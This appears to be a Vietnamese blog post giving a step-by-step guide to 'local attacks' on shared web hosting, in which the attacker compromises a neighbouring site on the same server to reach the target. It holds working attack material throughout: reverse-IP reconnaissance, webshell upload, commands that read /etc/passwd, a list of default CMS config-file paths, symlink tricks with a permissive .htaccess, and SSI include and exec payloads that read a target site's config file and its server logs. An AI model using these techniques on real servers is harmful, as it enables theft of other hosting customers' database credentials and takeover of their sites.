Các bước tấn công Local Attack
Bước 1: Xác định mục tiêu
Việc đầu tiên hacker sẽ xác định mục tiêu tấn công là site http://www.victim.com. Sau khi xác định mục tiêu, hacker sẽ tìm xem có những site nằm trên cùng server với victim. Điều này được thực hiện dễ dàng thông qua 1 số công cụ reverse ip
Whois FreeReverseIp
Bước 2: Chiếm quyền điều khiển một site cùng server với mục tiêu
Bằng các phương pháp: SQL injection, Reverse Directory Transversal, khai thác các bug… Việc này được thực hiện cho đến khi hacker chiếm quyền kiểm soát 1 website và upload được webshell của mình lên đó.
Bước 3: Thu thập thông tin về mục tiêu
Sau khi đã có webshell, hacker sẽ dò tìm, thu thập tất cả các thông tin về website victim như chạy dưới quyền user nào, thư mục gốc, được phân quyền ra sao…
cat /etc/passwd cat /etc/valiasse
Một số server cấm lệnh cat
Less /etc/passwd ./cat/etc/passwd More /etc/passwd
Bước 4: Tìm file path file config.php
Đối với các mã nguồn mở thì path file config được mặc định như sau:
Lưu ý: “path” chính là path từ server dẫn tới site, ví dụ đối với server linux, path là: /home/user/public_html
Bước 5- Get thông tin file config
5.1 Sử dụng lệnh cơ bản như cat, dir để xem tên thư mục đọc nội dung file.
5.2 Sử dụng symbolic link - symlink
Tuy nhiên để làm được điều này thì .htaccess có các điều kiện sauLưu ý: “path” chính là path từ server dẫn tới site, ví dụ đối với server linux, path là: /home/user/public_html
Vbulletin: public_html/includes/config.php PHPBB: public_html/config.php Joomla: public_html/configuration.php WordPress: public_html/wp-config.php ibp: public_html/conf_global.php php-fusion: public_html/config.php Smf: public_html/Settings.php phpnuke: public_html/html/config.php Xoops: public_html/mainfile.php ZenCart: public_html/includes/configure.php setidio: public_html/datas/config.php Discuz: public_html/config/config_ucenter.php Bo-Blog: public_html/data/config.php Nukeviet: public_html/config.php
Bước 5- Get thông tin file config
5.1 Sử dụng lệnh cơ bản như cat, dir để xem tên thư mục đọc nội dung file.
dir /home/public_html/includes cat /home/public_html/includes/config.php
5.2 Sử dụng symbolic link - symlink
Ln -s /home/public_html/NTCA/includes/config.php soleil.iniCó thể hiểu đơn giản là tạo 1 file soleil.ini trên host có nội dung giống file config.php
Options +FollowSymLinks #cho phép dùng symlink DirectoryIndex seees.html #vô hiệu hóa file index.html Options +Indexes #cho phép hiện cấu trúc thư mục
Nếu không có các điều đó bạn có thể gặp lỗi 500 Internal Server Error hoặc lỗi 403 Forbidden. Để khắc phục hiện tượng này, bạn chỉ cần tạo một file .htaccess có nội dung là 3 chỉ thị trên rồi upload lên server.
5.3 Sử dụng symlink với SSI
Đối với 1 sô server khi symbolic link bình thường xuất hiên 403 forbinden – không cho phép đọc file đã được symlink thì giải pháp được nghĩ đến đó là kết hợp với SSI.
- Tạo 1 file ducdung08clc.shtml với nội dung như sau:
<!--#include virtual="soleil.ini"-->Trong đó file soleil.ini là file đã được symbolic link trên server.
Bây giờ view source của file ducdung08clc.shtml ta sẽ thấy đc nội dung file soleil.ini đã symbolic link.
5.4 Chạy lệnh bằng file .shtml
Các cách trên không áp dụng được, thử chạy lệnh bằng file .shtml
<!--#exec cmd="cat /etc/passwd"-->Lệnh xem file logs như sau:
<!--#exec cmd="tail -n 10000 /var/log/httpd/domains/vhbgroup.net.error.log"-->Lưu ý:
+ lệnh tail cũng giống như lệnh cat nhưng nó dùng để xem nhưng dòng cuối cùng của file trên server.
+ /var/log/httpd/domains/vhbgroup.net.error.log là path dẫn đến file error.log của direct admin
+ Còn path dẫn đến file error.log của cpanel là: /usr/local/apache/logs/error_log ….., tùy vào bộ cài host mà path dẫn đến file error.log khác nhau.
Nguồn: Thao khảo ducdung08clc.blogspot.com
0 comments:
Post a Comment